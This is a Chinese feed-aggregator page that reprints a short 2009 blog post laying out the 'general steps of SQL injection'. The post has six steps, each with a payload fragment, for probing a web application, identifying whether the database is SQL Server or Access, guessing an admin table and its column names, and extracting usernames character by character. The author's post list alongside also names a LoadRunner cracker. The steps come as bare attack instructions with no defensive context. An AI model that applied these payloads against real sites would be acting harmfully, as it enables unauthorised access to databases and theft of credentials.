惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

T
Tenable Blog
H
Heimdal Security Blog
K
Kaspersky official blog
奇客Solidot–传递最新科技情报
奇客Solidot–传递最新科技情报
S
Schneier on Security
G
GRAHAM CLULEY
U
Unit 42
OSCHINA 社区最新新闻
OSCHINA 社区最新新闻
C
CERT Recently Published Vulnerability Notes
Google DeepMind News
Google DeepMind News
罗磊的独立博客
Stack Overflow Blog
Stack Overflow Blog
阮一峰的网络日志
阮一峰的网络日志
Simon Willison's Weblog
Simon Willison's Weblog
C
Cisco Blogs
Cyberwarzone
Cyberwarzone
T
The Exploit Database - CXSecurity.com
Project Zero
Project Zero
Security Archives - TechRepublic
Security Archives - TechRepublic
www.infosecurity-magazine.com
www.infosecurity-magazine.com
博客园 - 司徒正美
Exploit-DB.com RSS Feed
Exploit-DB.com RSS Feed
V
Visual Studio Blog
博客园 - Franky
Engineering at Meta
Engineering at Meta
WordPress大学
WordPress大学
Jina AI
Jina AI
P
Proofpoint News Feed
P
Proofpoint News Feed
有赞技术团队
有赞技术团队
L
LINUX DO - 最新话题
宝玉的分享
宝玉的分享
N
News and Events Feed by Topic
cs.CV updates on arXiv.org
cs.CV updates on arXiv.org
博客园 - 聂微东
T
The Blog of Author Tim Ferriss
Spread Privacy
Spread Privacy
Application and Cybersecurity Blog
Application and Cybersecurity Blog
IT之家
IT之家
S
Security Affairs
博客园 - 叶小钗
freeCodeCamp Programming Tutorials: Python, JavaScript, Git & More
小众软件
小众软件
N
News | PayPal Newsroom
Cloudbric
Cloudbric
AWS News Blog
AWS News Blog
W
WeLiveSecurity
The Last Watchdog
The Last Watchdog
Cyber Security Advisories - MS-ISAC
Cyber Security Advisories - MS-ISAC
NISL@THU
NISL@THU

博客园 - 张天利

换窝了! 性能监视器 SQL Server下如何对数据库的存储过程进行单元测试 LoadRunner9.5Cracker DataBuilder CookieReader URLResponseTime小工具 warning MSB4126(自动构建过程中网站发布不了) TFS端口列表 双色球自动选号工具 QQ开聊工具 SQLServer2005数据库同步过程 TFS2008命令行注释 查看源代码文件每一行进行更改的用户与时间信息 TFS2008从试用版升级到正式版方法 TF30170解决源代码管理文件夹的名称重复问题-解决方法2 TF30170解决源代码管理文件夹的名称重复问题 LoadRunner-ANSI C 脚本的常规 API 函数(其中包括所有协议,但 Java、VB 和 GUI 除外) 禁止TFS2008客户端自动登录TFS2008服务器.
sql注入的一般步骤
张天利 · 2009-10-20 · via 博客园 - 张天利

Posted on 2009-10-20 09:35  张天利  阅读(619)  评论(0)    收藏  举报

1、判断是否存在注入的可能。 ',and user>0, and 1=1,and 1=2.
2、判断数据库类型。and (select count(*) from sysobjects)>0 (sqlserver),
     and (select count(*) from msysobjects)>0 (Access).
3、猜解数据表。 and (select count(*) from user)>0.
4、猜解列名。 and (select count(username) from admins)>0.
5、猜解第一条记录的长度。and (select top 1 len(username) from admins)>0.
6、猜解字符。 and (select top 1 asc(mid(username,1,1)) from admins)>0.
至此注入完成。